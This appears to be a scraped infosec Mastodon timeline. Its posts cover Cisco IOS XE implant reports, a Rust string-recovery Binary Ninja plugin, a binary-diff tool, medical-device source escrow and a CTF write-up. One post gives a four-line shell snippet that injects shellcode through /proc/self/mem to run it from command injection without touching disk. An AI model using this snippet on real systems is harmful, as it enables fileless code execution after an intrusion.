Exploit developer at NCC group. Working in the Exploit Development Group with @saidelike and @alexplaskett
Competing in some pwn2own events since 2021.
100% voice coding for the last few years using Talon.
As many as 30,000 internet-facing Cisco routers and switches running IOS XE have been infected with implants after exploitation of CVE-2023-20198: https://vulncheck.com/blog/cisco-implants #infosec
Cisco's Talos has a blog here: https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/
Just re-read this.
Regulators of implanted medical technology should be demanding that all source code, design docs and other technical material be lodged in escrow.
If the company ceases to make support available, make it all public.
It's one thing for movies or TV shows or video games to disappear "into the vault", but prioritising protection of completely unused IP rights over the the health and wellbeing of patients is criminal.
New Rust string recovery @binaryninja plugin from me: Rust String Slicer (https://github.com/cxiao/rust_string_slicer). It finds the addresses and lengths of strings in Rust binaries, then sets the types of the strings so that they show as the correct lengths.
It uses very similar heuristics as the IDA Pro Rust Analysis Plugin from Hex-Rays, which I previously wrote about here: https://infosec.exchange/@cxiao/110637216992474832
Give it a try, let me know if it's useful, and file an issue if it breaks for your binary (I know there are definitely binaries for which it breaks haha). 
Thank you to several people in the OALabs discord for watching me hack on this and giving useful tips during the development!
#rust #rustlang #reverseengineering #malwareanalysis #reversing #binaryninja
A Binary Ninja plugin to help find the addresses and lengths of strings in Rust binaries. - GitHub - cxiao/rust_string_slicer: A Binary Ninja plugin to help find the addresses and lengths of string...
Today was ... interesting. If you followed me for the past months over on the shitbird site, you might have seen a bunch of angry German words, lots of graphs, and the occassional news paper, radio, or TV snippet with yours truely. Let me explain.
In Austria, inflation is way above the EU average. There's no end in sight. This is especially true for basic needs like energy and food.
Our government stated in May that they'd build a food price database together with the big grocery chains. But..
BioDiff: Compare binary files using alignment algorithms.
It looks interesting - note the skipped gaps in the compared displays!
https://github.com/8051Enthusiast/biodiff
After a morning of code golf, here are 4 lines of portable shell script to run your shellcode on Linux from command injection without touching disk:
Jeremy Kirk
Tom Morris
Cindʎ Xiao 🍉
Etienne Jacob
Mario Zechner
qwertyoruiopz
Ange
niconiconi
joevPAYLOAD='\100\000\200<shellcode...>\000\000\000\000'
exec 5>/proc/self/mem
read -r _ _ _ _ _ _ _ _ ADDR </proc/self/syscall
( dd count=0 bs=1 skip=$((ADDR)) <&5; printf "${PAYLOAD}" >&5 )
This is maybe the coolest thing I've seen in my life.
T3mp3st not only did a writeup of the CTF I helped build (which feels very cool to say) but also managed to get the original PCAP files Mike Lindell used in his cybersecurity summit.
Legit losing my mind at how cool this is. I couldn't talk about the pcaps until after the ctf was over but the second I got an email asking to do a USB drive handoff I started hooting and hollering like a howler monkey.
https://medium.com/@t3mp3st.19/noisefest-ctf-2023-7f4ba113fd11
Dio9sys